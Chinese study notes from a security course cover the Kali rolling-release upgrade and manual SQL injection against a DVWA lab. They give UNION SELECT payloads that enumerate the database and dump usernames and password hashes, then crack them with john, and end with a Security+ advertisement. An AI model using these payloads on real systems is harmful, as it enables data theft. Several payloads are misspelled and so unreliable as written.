您的位置:首页 > 数据库

【安全牛学习笔记】KALI版本更新(第一个ROLLING RELEASE)和手动漏洞挖掘(SQL注入)

2017-09-28 11:54 597 查看
KALI版本更新-----第一个ROLLING RELEASE

Kali 2.0发布时声称将采用rolling release模式更新(但并未实施)

Fixed-release

    固定发布周期

    使用软件稳定的主流版本

        发布-----主流-----作废

    更稳定,适合于企业生产环境

Rolling release

    使用于开发者和技术人员

    连续升级新版本,追求在新功能出现后最快使用

    正在成为流行

KALI版本更新-----第一个ROLLING RELEASE

Kali 2.0 rolling release

    过去的5个月在少部分受邀人群中测试

    采用debian testing库作为更新源

软件包追踪

    http://pkg.kali.org/
WMware Tools vs Open-VM-Tools

    apt-get install open-vm-tools-desktop fuse

Gnome 3.18

4.3内核

KALI版本更新-----第一个ROLLING RELEASE

kali 2.0现有版本升级

cat << EOF > /etc/apt/sources.list

deb http://http.kali.org/Kali kali-rolling main non-free contrib

EOF

apt-get update

apt-get dis-upgrade # get a coffee, or 10.

reboot

kali sana库将于2016年4月15日停止更新

目前存在一些小问题,相信很快会解决

工具有所更新

手工漏洞挖掘-----SQL注入

服务器端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器

用户登录判断

    SELECT*FROM users WHAERE usr='uname' AND password='pass'

    SELECT*FROM users WHAERE usr='uname' AND password="OR"=''

msfadmin@metasploitable:~# ifocnfig

msfadmin@metasploitable:~# sudo dhclient eth0

手动漏洞挖掘-----SQL注入

基于报错的检测方法(low)

    '"%()

基于布尔的检测

    1'and'1'='1    /    1'and'1

    1'and'1'='2    /    1'and'0

表列书/显示信息位于哪一列

    'order by 9--+    #按查询序列号排序(注释符: -)

        select*时表字段数=查询字段数

联合查询

    'union select 1,2-+

    'union all select database(),2-+

手动漏洞挖掘-----SQL注入

union select database(),substring_index(USER(),"@",1)--

DB用户: user()

DB版本: version()

全局函数:@@datadir、@@hostname、@@VERSION、@@version_compile_os

当前库: database()

ASCII转字符: char()

连接字符串: CONCAT_WS(CHAR(32、58、32),user(),database(),version())

计算哈希: md5()

Mysql数据结构

    information_schema

手动漏洞挖掘-----SQL注入

所有库所有表/统计每库中表的数量

    union select table_name,table_schema from information_sechema,table--

    UNION selsct table_schema.count(*) FROME information_Schema,table group by table_schema --

Dvwa库中的表名

    'union select table_name,table_schema from inforamtion_schema from information_schema,table where table_schema='dvwa'-+

Users表中的所有列(user_id、fist_name、last_name、user、password、avatar)

    'union select table_name,column_name from inforation_schema.columns where table_schema='dvwa' and table name='users'-+

查询user、password列的内容

    'union select user,password from dvwa,users-+

    'union select user,password from users-+

    'union select unll,concat(user,0x3a,password) from users-+

root@kali:~# hash

hash             hashcat-cliXOP   hashid

hashcat          hashdeep         hash-identifier

root@kali:~# hash-identifier

手动漏洞挖掘-----SQL注入

密码破解

    username:passhash----->dvwa.txt

    john --format=raw-MD5 dvwa.txt

root@kali:~# ls

root@kali:~# cat dvwa.txt

root@kali:~# john --format=raw-MD5 dvwa.txt



该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证?

      牛妹先给大家介绍一下Security+

        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息